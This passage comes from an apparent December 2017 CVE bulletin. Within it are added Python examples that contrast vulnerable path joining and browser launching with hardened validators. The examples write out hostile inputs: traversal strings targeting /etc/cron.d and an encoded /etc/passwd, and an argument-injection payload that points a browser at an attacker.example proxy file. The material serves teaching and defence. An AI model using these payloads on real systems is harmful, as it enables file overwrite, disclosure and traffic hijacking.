Security researchers discovered an authentication bypass vulnerability in version 2.0.2 of the Conserus Workflow Intelligence application by McKesson Medical Imaging Company, which is now a Change Healthcare company. The attacker must send a malicious HTTP GET request to exploit the vulnerability. The vulnerability allows an attacker to bypass authentication and escalate privileges of valid users. An unauthenticated attacker can exploit the vulnerability and be granted limited access to other accounts. An authenticated attacker can exploit the vulnerability and be granted access reserved for higher privilege users.2017-12-15not yet calculatedCVE-2017-16776
MISC
meinberg -- lantime_devices
 
Directory traversal vulnerability in the "Upload Groupkey" functionality in the Web Configuration Utility in Meinberg LANTIME devices with firmware before 6.24.004 allows remote authenticated users with Admin-User access to write to arbitrary files and consequently gain root privileges by uploading a file, as demonstrated by storing a file in the cron.d directory.2017-12-15not yet calculatedCVE-2017-16788
FULLDISC
meinberg -- lantime_devices
 
The Web Configuration Utility in Meinberg LANTIME devices with firmware before 6.24.004 allows remote authenticated users with certain privileges to read arbitrary files via (1) the ntpclientcounterlogfile parameter to cgi-bin/mainv2 or (2) vectors involving curl support of the "file" schema in the firmware update functionality.2017-12-15not yet calculatedCVE-2017-16787
FULLDISC
FULLDISC
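The IBM Sterling File Gateway "dot dot" read above and the two Meinberg LANTIME entries (an upload name that lands in cron.d, a parameter that names an arbitrary file to read) are the same defect seen from the read and the write side. The code below is an added example, not from either product: a naive join that shows the escape, and a confinement check that decodes percent-encoding, normalizes, and then tests containment by path component rather than by string prefix. The root directories are assumptions for the demo.

```python
import posixpath
from urllib.parse import unquote

UPLOAD_ROOT = "/var/lib/app/uploads"     # assumed destination directory (demo)
DOC_ROOT = "/srv/app/public"             # assumed directory a URL may read from


def resolve_vulnerable(root: str, user_path: str) -> str:
    """The pattern behind both bulletin entries: the client-supplied name is
    joined to a base directory and used as-is. '..' walks straight out."""
    return posixpath.normpath(posixpath.join(root, user_path))


def confine(root: str, user_path: str) -> str:
    """Map a client-supplied relative path to a location under root, or raise.
    Decodes percent-encoding first (so %2e%2e%2f is seen as ../), treats a
    backslash as a separator, refuses NUL, and then checks containment by
    path components rather than by string prefix."""
    decoded = unquote(user_path)
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    decoded = decoded.replace("\\", "/")
    # posixpath.join discards root when the second part is absolute, so strip
    # leading slashes instead of letting "/etc/passwd" replace the root
    target = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # commonpath compares whole components: /srv/app/public-evil/x would
    # pass a startswith(root) test but fails here
    if target == root or posixpath.commonpath([root, target]) != root:
        raise ValueError("path escapes root: " + user_path)
    return target


def upload_target(filename: str) -> str:
    """Stricter rule for the upload case: only a bare file name is acceptable,
    so any separator or dot-name is an error rather than something to clean."""
    name = unquote(filename).replace("\\", "/")
    if name in ("", ".", "..") or "/" in name or name.startswith("."):
        raise ValueError("upload name must be a plain file name")
    return confine(UPLOAD_ROOT, name)


def is_rejected(func, *args) -> bool:
    try:
        func(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    evil = "../../../../etc/cron.d/job"
    print("vulnerable:", resolve_vulnerable(UPLOAD_ROOT, evil))
    print("upload    : rejected =", is_rejected(upload_target, evil))
    print("encoded   : rejected =",
          is_rejected(confine, DOC_ROOT, "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"))
```

On a real filesystem, run os.path.realpath on the result before opening it: a symlink placed under the root by an earlier upload can still point outside, and only the resolved path tells you where the write will land.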
mensis -- mensis
 
uiutil.c in Mensis 0.0.080507 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, a different vulnerability than CVE-2017-17521.2017-12-14not yet calculatedCVE-2017-17534
MISC
metview -- metview
 
etc/ObjectList in Metview 4.7.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17515
MISC
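FontForge, Geomview, GNU GLOBAL, KildClient, Kiwi, LilyPond, Mensis and Metview above share one bug: the program named by the BROWSER environment variable is launched with a URL that was never checked, so a URL beginning with an option (the LilyPond entry names --proxy-pac-file) is taken by the browser as a switch, and a URL containing a space becomes two arguments when the command goes through a shell. The following is an added example, not code from any of these projects: it shows the argv the vulnerable string-splice produces, then a validator and launcher that reject option-shaped and multi-word URLs and never involve a shell. The attacker host in the constructed payload is an assumption.

```python
import os
import shlex
import subprocess
from urllib.parse import urlsplit

# Constructed attacker input: a "URL" that is really an option plus a second
# word. The proxy-auto-config host is an assumption for the demo.
PAYLOAD = "--proxy-pac-file=http://attacker.example/evil.pac http://example.com/"


def browser_argv_vulnerable(url: str, browser: str) -> list:
    """The shape behind the bulletin entries: $BROWSER and the URL are pasted
    into one string and handed to the shell. Returned as the argv the shell
    would produce (instead of executing it) so the injection is visible."""
    return shlex.split(browser + " " + url)


def validate_url_for_browser(url: str) -> str:
    """Accept only an absolute http(s) URL that can neither be read as an
    option nor split into several words. Everything else is an error."""
    if url.startswith("-"):
        raise ValueError("URL looks like a command-line option")
    if any(c.isspace() for c in url) or any(c in url for c in ";&|`$<>\"'\\"):
        raise ValueError("URL contains whitespace or shell metacharacters")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("only absolute http(s) URLs are opened")
    return url


def browser_argv_safe(url: str, browser: str) -> list:
    """BROWSER itself may legitimately carry options ('firefox -new-tab'), so
    it is split; the URL is validated and appended as one argv element.
    Passing an argv list alone is not enough: a lone '--proxy-pac-file=...'
    URL would still be one argument that the browser reads as an option,
    which is why the leading '-' check above is the essential part."""
    return shlex.split(browser) + [validate_url_for_browser(url)]


def url_rejected(url: str) -> bool:
    try:
        validate_url_for_browser(url)
    except ValueError:
        return True
    return False


def open_in_browser(url: str) -> int:
    """What a help viewer should do: no shell, validated URL, own argv slot."""
    browser = os.environ.get("BROWSER", "xdg-open")
    return subprocess.call(browser_argv_safe(url, browser))


if __name__ == "__main__":
    print("vulnerable:", browser_argv_vulnerable(PAYLOAD, "chromium"))
    print("rejected  :", url_rejected(PAYLOAD))
    print("safe      :", browser_argv_safe("https://example.com/manual", "firefox -new-tab"))
```

The same rule covers the C programs in the list: build an argv array and call execvp (or posix_spawn) rather than system(), and refuse the URL before it reaches either.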
micro_focus -- project_and_portfolio_management_center
 
Man-In-The-Middle vulnerability in Micro Focus Project and Portfolio Management Center, version 9.32. This vulnerability could be exploited to allow a Man-in-the-middle attack.2017-12-12not yet calculatedCVE-2017-14361
CONFIRM
micro_focus -- project_and_portfolio_management_center
 
Cross-Site Request Forgery vulnerability in Micro Focus Project and Portfolio Management Center, version 9.32. This vulnerability could be exploited to allow a Cross-Site Request Forgery attack.2017-12-12not yet calculatedCVE-2017-14362
CONFIRM
microsoft -- chakracore
 
ChakraCore allows an attacker to execute arbitrary code in the context of the current user, due to how the ChakraCore scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11916
BID
CONFIRM
microsoft -- device_guard
 
Device Guard in Windows 10 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allows a security feature bypass vulnerability due to the way untrusted files are handled, aka "Microsoft Windows Security Feature Bypass Vulnerability".2017-12-12not yet calculatedCVE-2017-11899
BID
SECTRACK
CONFIRM
microsoft -- exchange_server
 
Microsoft Exchange Server 2016 CU5 and Microsoft Exchange Server 2016 CU5 allow a spoofing vulnerability due to the way Outlook Web Access (OWA) validates web requests, aka "Microsoft Exchange Spoofing Vulnerability".2017-12-12not yet calculatedCVE-2017-11932
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Information Disclosure Vulnerability". This CVE ID is unique from CVE-2017-11906 and CVE-2017-11919.2017-12-12not yet calculatedCVE-2017-11887
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11901
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11903
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11913
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11907
BID
SECTRACK
CONFIRM
microsoft -- internet_explorer
 
Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Information Disclosure Vulnerability". This CVE ID is unique from CVE-2017-11887 and CVE-2017-11919.2017-12-12not yet calculatedCVE-2017-11906
BID
SECTRACK
CONFIRM
microsoft -- malware_protection_engine
 
The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Windows 7 SP1, Windows 8.1, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and 1709, Windows Server 2016, Windows Server, version 1709, and Microsoft Exchange Server 2013 and 2016, does not properly scan a specially crafted file, leading to remote code execution, aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability". This is different from CVE-2017-11937.2017-12-08not yet calculatedCVE-2017-11940
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how Microsoft Edge handles objects in memory, aka "Microsoft Edge Memory Corruption Vulnerability".2017-12-12not yet calculatedCVE-2017-11888
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Internet Explorer and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11912
BID
SECTRACK
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11893
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11918
BID
SECTRACK
CONFIRM

microsoft -- multiple_products

ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and and Internet Explorer adn Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11894
BID
SECTRACK
SECTRACK
CONFIRM

microsoft -- multiple_products

ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, and Internet Explorer and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11895
BID
SECTRACK
SECTRACK
CONFIRM
microsoft -- multiple_productsChakraCore and Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11911
BID
SECTRACK
CONFIRM

microsoft -- multiple_products

Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11890
BID
SECTRACK
CONFIRM

microsoft -- multiple_products

ChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11889
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore and Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11909
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11910
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore and Windows 10 1709 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11908
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11914
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, and CVE-2017-11916.2017-12-12not yet calculatedCVE-2017-11930
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11905
BID
SECTRACK
CONFIRM
microsoft -- multiple_products
 
ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016, and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how the scripting engine handles objects in memory, aka "Scripting Engine Information Disclosure Vulnerability". This CVE ID is unique from CVE-2017-11887 and CVE-2017-11906.2017-12-12not yet calculatedCVE-2017-11919
BID
SECTRACK
CONFIRM
microsoft -- office_2016_click-to-run
 
Microsoft Office 2016 Click-to-Run (C2R) allows a remote code execution vulnerability due to the way files are handled in memory, aka "Microsoft Excel Remote Code Execution Vulnerability".2017-12-12not yet calculatedCVE-2017-11935
BID
SECTRACK
CONFIRM
microsoft -- office_2016_click-to-run
 
Microsoft Office 2016 Click-to-Run (C2R) allows an information disclosure vulnerability due to the way Microsoft Office enforces DRM copy/paste permissions, aka "Microsoft Office Information Disclosure Vulnerability".2017-12-12not yet calculatedCVE-2017-11939
BID
SECTRACK
CONFIRM
microsoft -- office
 
Microsoft Office 2013 RT SP1, Microsoft Office 2013 SP1, and Microsoft Office 2016 allow an information disclosure vulnerability due to the way certain functions handle objects in memory, aka "Microsoft Office Information Disclosure Vulnerability".2017-12-12not yet calculatedCVE-2017-11934
BID
SECTRACK
CONFIRM
microsoft -- sharepoint_enterprise_server_2016
 
Microsoft SharePoint Enterprise Server 2016 allows an elevation of privilege vulnerability due to the way web requests are handled, aka "Microsoft SharePoint Elevation of Privilege Vulnerability".2017-12-12not yet calculatedCVE-2017-11936
BID
SECTRACK
CONFIRM

microsoft -- windows

Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow a remote code execution vulnerability due to the way the Routing and Remote Access service handles requests, aka "Windows RRAS Service Remote Code Execution Vulnerability".2017-12-12not yet calculatedCVE-2017-11885
BID
SECTRACK
CONFIRM

microsoft -- windows

Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.2017-12-12not yet calculatedCVE-2017-11886
BID
SECTRACK
CONFIRM
microsoft -- windows
 
Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow an information vulnerability due to the way the Windows its:// protocol handler determines the zone of a request, aka "Microsoft Windows Information Disclosure Vulnerability".2017-12-12not yet calculatedCVE-2017-11927
BID
SECTRACK
CONFIRM
mikrotik -- multiple_devices
 
MikroTik v6.40.5 devices allow remote attackers to cause a denial of service via a flood of ICMP packets.2017-12-13not yet calculatedCVE-2017-17538
EXPLOIT-DB
mikrotik -- routerboard
 
MikroTik RouterBOARD v6.39.2 and v6.40.5 allows an unauthenticated remote attacker to cause a denial of service by connecting to TCP port 53 and sending data that begins with many '\0' characters, possibly related to DNS.2017-12-13not yet calculatedCVE-2017-17537
EXPLOIT-DB
mobotap -- dolphin_browser_for_android
 
The Backup and Restore feature in Mobotap Dolphin Browser for Android 12.0.2 suffers from an arbitrary file write vulnerability when attempting to restore browser settings from a malicious Dolphin Browser backup file. This arbitrary file write vulnerability allows an attacker to overwrite a specific executable in the Dolphin Browser's data directory with a crafted malicious executable. Every time the Dolphin Browser is launched, it will attempt to run the malicious executable from disk, thus executing the attacker's code.2017-12-11not yet calculatedCVE-2017-17551
MISC
mobotap -- dolphin_browser_for_android
 
The Dolphin Browser for Android 12.0.2 suffers from an insecure parsing implementation of the Intent URI scheme. This vulnerability could allow attackers to abuse this implementation through a malicious Intent URI, in order to invoke private Activities within the Dolphin Browser.2017-12-11not yet calculatedCVE-2017-17553
MISC
nip2 -- nip2
 
** DISPUTED ** boxes.c in nip2 8.4.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a software maintainer indicates that this product does not use the BROWSER environment variable.2017-12-14not yet calculatedCVE-2017-17514
MISC
node.js -- node.js
 
Node.js was affected by OpenSSL vulnerability CVE-2017-3737 in regards to the use of SSL_read() due to TLS handshake failure. The result was that an active network attacker could send application data to Node.js using the TLS or HTTP2 modules in a way that bypassed TLS authentication and encryption.2017-12-11not yet calculatedCVE-2017-15896
CONFIRM
node.js -- node.js
 
Node.js had a bug in versions 8.X and 9.X which caused buffers to not be initialized when the encoding for the fill value did not match the encoding specified. For example, 'Buffer.alloc(0x100, "This is not correctly encoded", "hex");' The buffer implementation was updated such that the buffer will be initialized to all zeros in these cases.2017-12-11not yet calculatedCVE-2017-15897
CONFIRM
ocaml -- ocaml_batteries_included
 
